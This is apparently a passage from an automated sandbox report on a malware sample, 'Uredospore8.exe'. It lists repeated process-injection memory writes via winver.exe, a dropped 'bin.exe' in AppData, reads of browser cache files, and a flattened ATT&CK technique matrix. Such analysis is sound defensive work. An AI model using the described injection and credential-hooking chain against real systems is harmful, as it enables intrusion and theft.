    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 11A0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2340000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: D60000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: E10000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2140000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 730000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: B10000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2680000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2550000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2130000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2BA0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2B20000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 11D0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: B80000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1370000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2ED0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2120000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 28D0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 22B0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2930000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 25B0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2D10000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2920000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2480000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2180000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2D60000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 14D0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 26B0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1380000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2840000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: B30000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 690000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 23B0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2F10000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 22B0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2210000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: C10000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: F90000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 620000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 860000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 7A0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1270000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 690000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: BD0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 5F0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 920000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 10C0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 980000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2000000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: A20000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 10F0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 13E0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1450000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: E90000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: CB0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: B60000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2B90000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1320000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: DB0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 7F0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2500000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2100000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 12E0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1480000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: E60000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1420000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: E90000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: ED0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 29A0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2C30000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2B80000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: D30000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 11E0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: E20000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 6A0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1370000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 23B0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 810000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2980000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1360000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 750000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: B80000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 590000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 9D0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\dllhost.exe base: 5F0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe base: 2140000Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe base: 1C0000Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe base: 1C0000Jump to behavior
    Source: C:\Users\user\Desktop\Uredospore8.exeProcess created: C:\Users\user\Desktop\Uredospore8.exe "C:\Users\user\Desktop\Uredospore8.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Uredospore8.exeProcess created: C:\Windows\SysWOW64\winver.exe winverJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeProcess created: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe "C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe" Jump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeProcess created: unknown unknownJump to behavior
    Source: explorer.exe, 00000004.00000002.3360217865.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2193119293.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000005.00000002.3369167482.000001D63C371000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
    Source: explorer.exe, 00000004.00000002.3360217865.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2194095055.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3399015831.00000000048E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000004.00000002.3360217865.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2193119293.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000005.00000002.3369167482.000001D63C371000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
    Source: ctfmon.exe, 00000008.00000002.3359267400.00000128DBAF7000.00000004.00000020.00020000.00000000.sdmp, ctfmon.exe, 00000008.00000000.2226537305.00000128DBAF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd&
    Source: winver.exe, 00000003.00000002.3338776042.0000000000ABC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: "vShell_TrayWndr[
    Source: explorer.exe, 00000004.00000000.2192850877.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3342158192.0000000000D69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progman
    Source: explorer.exe, 00000004.00000002.3360217865.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2193119293.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000005.00000002.3369167482.000001D63C371000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
    Source: explorer.exe, 00000004.00000002.3431957145.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2979250085.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2196219993.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd31A
    Source: winver.exe, 00000003.00000002.3338776042.0000000000ABC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: "vShell_TrayWnd
    Source: C:\Users\user\Desktop\Uredospore8.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133694340288381827.txt VolumeInformationJump to behavior
    Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformationJump to behavior
    Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm VolumeInformationJump to behavior
    Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformationJump to behavior
    Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeQueries volume information: C:\ VolumeInformationJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
    Native API
    11
    Registry Run Keys / Startup Folder
    512
    Process Injection
    3
    Rootkit
    1
    Credential API Hooking
    1
    Query Registry
    Remote Services1
    Credential API Hooking
    21
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    DLL Side-Loading
    1
    Abuse Elevation Control Mechanism
    1
    Masquerading
    LSASS Memory221
    Security Software Discovery
    Remote Desktop Protocol11
    Archive Collected Data
    1
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
    Registry Run Keys / Startup Folder
    1
    Virtualization/Sandbox Evasion
    Security Account Manager1
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive2
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
    DLL Side-Loading
    512
    Process Injection
    NTDS3
    Process Discovery
    Distributed Component Object ModelInput Capture13
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Deobfuscate/Decode Files or Information
    LSA Secrets1
    Application Window Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Hidden Files and Directories
    Cached Domain Credentials1
    File and Directory Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    Abuse Elevation Control Mechanism
    DCSync221
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job3
    Obfuscated Files or Information
    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
    Software Packing
    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
    DLL Side-Loading
    Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
